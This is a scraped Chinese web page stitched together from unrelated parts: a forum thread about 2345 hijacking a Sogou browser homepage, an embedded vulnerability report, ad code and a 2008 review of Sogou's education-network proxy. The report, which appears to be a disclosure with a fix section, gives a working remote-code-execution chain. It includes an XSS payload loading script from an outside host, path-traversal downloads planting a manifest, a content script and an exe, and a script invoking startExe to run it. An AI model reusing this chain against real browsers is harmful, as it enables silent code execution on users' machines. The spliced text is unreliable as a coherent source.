搜狗浏览器主页被2345流氓网址导航黑了,怎么破?_搜狗浏览器吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：4,544贴子：
搜狗浏览器主页被2345流氓网址导航黑了,怎么破?收藏
2345这流氓可恶之极,把我浏览器的主页修改了,只要一打开浏览器,就会自动跳到2345,在网上找了好多方法都试过了,最后重装系统,尼玛这货居然还死不了,打开浏览器依然自动跳到2345网址导航,实在太恶心了,求破解...
0基础电脑培训——变身高富帅!
用360安全卫士绑定浏览器试试。
你可以在清楚各种2345的插件之后，打开注册表，查询搜索2345，所有有关2345的注册表全删掉，就应该没事了。想当初我的hao123就这么整没的
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或搜狗浏览器某漏洞一日中招后日日皆后门
听说搜狗输入法听歌挺不错。
1. 最新版本5.3.6.16631（上次漏洞版本为：5.2.5.15987），但上一个漏洞并未认真修复。
2. xss虽然修了，但是没修好，依然可以继续利用。比如用来加载一个外部JS:http://x.com/poc/sogou5.2.js
/vc/play/redirect.jsp?url=/show/id/480').close();function open(){};if(!window._x){window._x=1;var s=document.createElement('script');s.src='//x.com/poc/sogou5.2.js?'%2bMath.random();document.body.appendChild(s);};a=open('a','&type=zhibo_vr&tvstation=%C7%E0%BA%A3%CE%C0%CA%D3
3. window.open(&se://...&).external 获得高权限external的问题依然没有解决，因此上一个漏洞里的方法依然有效（ WooYun: 搜狗浏览器远程命令执行之五 ）。
这意味着，依然可以执行到静默安装 com.sogou.cxj009.PicViewer这个扩展，并且该扩展的XSS漏洞并未修复，之前报过的下载任意文件到本地指定目录的缺陷也并未修补（ WooYun: 搜狗浏览器远程命令执行之四 ）。
4. com.sogou.feichuan默认安装下是1.0.0.23，这个版本下不存在上一个漏洞中所说的命令执行API，但是如果用户安装到1.0.0.26，上一个漏洞依然可以成功被利用。
5. 这里假定用户安装的就是 1.0.0.23 版本的 com.sogou.feichuan，我们不使用飞传这个扩展来进行利用，换一个方式。
6. 方式如下：
A. 利用com.sogou.cxj009.PicViewer的文件下载到任意目录的缺陷 （ WooYun: 搜狗浏览器远程命令执行之四 ）。
B. 分别下载3个文件
http://x.com/poc/sogou.xml --& ../..\\Roaming\\SogouExplorer\\Extension\\com.sogou.gamecenter\\1.1.0\\manifest.xml
http://x.com/poc/hehe.js --& ../..\\Roaming\\SogouExplorer\\Extension\\com.sogou.gamecenter\\1.1.0\\hehe.js
http://x.com/poc/calcx.exe --& ../..\\Roaming\\SogouExplorer\\Extension\\com.sogou.gamecenter\\1.1.0\\sogouminigamepacker.exe
第一个文件，用来修改com.sogou.gamecenter这个扩展的 manifest.xml，主要修改2个点，
1是为plugin添加public=&true&，让该plugin可以暴露给任意页面
application/sogou-start-gamecenter-lite-plugin
2是添加一个content script，让每个网页都会加载hehe.js里的代码
第二个文件，就是被加载的hehe.js，代码如下：
//在页面内嵌入一个application/sogou-start-gamecenter-lite-plugin
var a=document.createElement(&div&);
a.innerHTML='';
document.body.appendChild(a);
//在页面内调用 application/sogou-start-gamecenter-lite-plugin 的 startExe 执行指定路径的exe
//现在版本的com.sogou.gamecenter的startExe函数的第一个参数已经改为了目录路径，会执行此目录下的sogouminigamepacker.exe
var b=document.createElement(&script&);
b.innerHTML='document.getElementById(&embed1&).startExe(&../../Roaming/SogouExplorer/Extension/com.sogou.gamecenter/1.1.0/\\u0000&,&/popgame &,function(){})';
document.body.appendChild(b);
第三个文件，就是需要被hehe.js里的代码所执行的 sogouminigamepacker.exe
C. 当用户访问一次 攻击页面后， 攻击者会释放 以上3个文件，
当用户下次打开浏览器时，任意打开一个页面，就会调用 hehe.js 这个content script，然后利用被public的 application/sogou-start-gamecenter-lite-plugin 的startExe函数来执行所下载的sogouminigamepacker.exe。
过程如下图所示：
7. 具体利用流程：
http://x.com/poc/sogou_combine2.htm
/vc/play/redirect.jsp (XSS漏洞)
http://x.com/poc/sogou5.2.js （调用）
window.open(&se://sidebarextmanager/index.html&).external.extension(&installExtFromSidebarBox&, &com.sogou.cxj009.PicViewer&,...) （调用高权限external安装com.sogou.cxj009.PicViewer）
/vc/play/redirect.jsp （再次利用这个XSS漏洞）
http://x.com/poc/sogou5.3.js （调用）
se-extension://ext-/v.html （利用com.sogou.cxj009.PicViewer的XSS漏洞及download API）
document.getElementById(&picdownloader&).download （步骤6中的三个下载过程）
用户下次使用搜狗浏览器时，执行上一次埋下的EXE。
7. 最终利用效果如下：
其中，测试代码中，com.sogou.gamecenter 是1.1.0版本，现在已经有新的1.2.0版本了，但是这并不影响文中的利用方式。只需要把sogou.xml里的版本号以及利用代码路径中的1.1.0 都改为1.2.0即可。
解决方案：
主要依然是对 window.open(&se://...&).external 的修复，另外防止这类恶意修改manifest.xml的行为，应该对 manifest.xml 做改动检查。
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'搜狗浏览器 – 教育网用户测评
Loading...
基于 IE 内核让人很失望。当然，这可以很好的兼容大多数网页，以及变态的 IE only 的网银。其宣传的也在我们的努力下变得必死。当然，重要的还是教育网加速，这个相当牛逼的功能，相信大多数被囚禁在教育网内的用户都会喜欢的。
以及，我无法打开加速功能，难道这个不给公网用户开发？还是传说中的 RP 问题
小众召集几位教育网用户测试这个教育网浏览加速功能，下面分别来看：
(身处北大教育网):
惊闻搜狗浏览器有教育网加速功能，所谓教育网加速就是和教育网直通车、亿目加速器一样可以让你通过搜狗的服务器访问教育网不能直接访问的国际网络，教育网的同学们，这么没有取之于民却用之于民的活雷锋举动，你说我能不怀着异常激动的心情去猛点搜狗浏览器的beta版下载链接吗？
此处被屏蔽
当然，速度方面可能还有待提高，比如看 Youtube 视频比较卡，但浏览图片文字内容是很流畅的。话说回来，教育网是科研人员和师生最常用的网络环境，提供畅通无阻的网络本是教育系统的分内之事，现在搜狗做了一件政府应该做的事，我觉得在高兴的同时似乎有那么一点悲哀。不管怎样，搜狗浏览器恐怕离不开了，谁让咱们的教育网那么跟国际截轨呢……嗯，继续试用，以观后效。
cynic(成员，教育网):
的确有作用，用 Firefox 打开 Feedsky 非常慢，用 Sogou 浏览器一下子就打开了 (scavin:这句话很耳熟，貌似很黄很暴力的来源)
Facebook 用 Firefox 打开 30s，用 Sogou 浏览器打开是 10s，CNN 也是30s vs 10s，Sogou 访问公网和国外还是有明显的速度提升的。
但是它用 IE 核心还是有好处有坏处，好处在于兼容性好，坏处在于安全性问题比较大。Sogou 连接招行网银也非常快， 这点非常好，教育网连接招行是比较慢的。
Soguo 浏览器如果能够让用户选择是用什么浏览器内核，比如 IE 或者 Gecko 就好了，我印象中有个浏览器是可以切换使用不同的浏览器内核的。
(著名 blogger):
代理的速度不错。我上了一下维基首页，网通大概 5 秒全部打开，半条教育网：1min+，半条教育网+Sogou：21s
注:半条教育网：因为我这里的教育网比较变态，能上外网
要是搜狗的教育网代理顺带xx功能肯定会很受欢迎
测试二级代理:您设置了代理服务器，暂时无法使用本功能
我觉得无论在于在 IE 上做改进都没什么用，功能性元件其它浏览器都可以实现，关键是渲染速度和减少假死
我让搜狗浏览器假死了。Google Reader 在搜索框里选频道，用字母选，我试过，IE 内核的都死。。。。
的 P.S. Giveawayoftheday 今天释出了，比小众以前介绍的好用一些。
它专门修复损坏的照片，比如有墨迹或者照片老化了。换句话说就是拿来擦掉画面中的水印。。从 demo 看，还不错。比 Teorex.Inpaint 要方便写，Teorex 只能用矩形框来选择，而它是直接涂抹画面中的不规则图形。然后点击绿色播放按钮就可以擦掉了。有需要的朋友可以试试。
注意：软件的激活时限是北京时间 2008 年 12 月 23 日下午 4 点之前。
update: 同学详细测评，详见其
对这款浏览器优势我主要从以下几个方面进行分析：
第一：快速安装
第二：浏览器界面
第三：基于 IE 内核
第四：教育网加速代理
我认为这个浏览器也有一些不太理想的地方，
其一：没有将 Internet 选项与浏览器选项合并起来，设置选项的过程很麻烦，需要来回找。
其二：在加载页面的过程中，网站的 Favicon 大部分时候先于页面内容显示，而不是通常我们所看到的旋转缓冲标志，当然这款浏览器也有这个（很像太极图），但是表现不明显，打开多个标签页的时候容易误导人。
再有我用测试的 blog（国外的虚拟主机）时候，出现下面的异常情况，不知道是不是浏览器的原因。
总之这款浏览器是非常值得期待的，因为我们是传说中的教育网啊！额！打算用下去了。
传说中的沙发？
按分类查看文章:
大家都在讨论些什么
: 错别字：
童话 --&& 通话: 电池用了大半年怎么显示循环充电次数0: dukto ，不过安卓端已经很久没更新了，windows平台倒是开发了UWP，但有些问题: /store/apps/details?id=com.skvalex.callrecorder
应该是Call Recorder: DW 联系人&拨号 Pro
9.99: 还是要开免提
不考虑其他问题，单就这个录音功能，还是里面的手机方便。打算买个oppo A31去: 单身汪正在学习中~~
最热门标签
传说中的小众软件 让你的手机应用与众不同。
个人 blog 转载时请遵循 “署名-非商业性使用-相同方式共享” 的创作共用协议；
商业网站或未授权媒体不得复制本站内容。}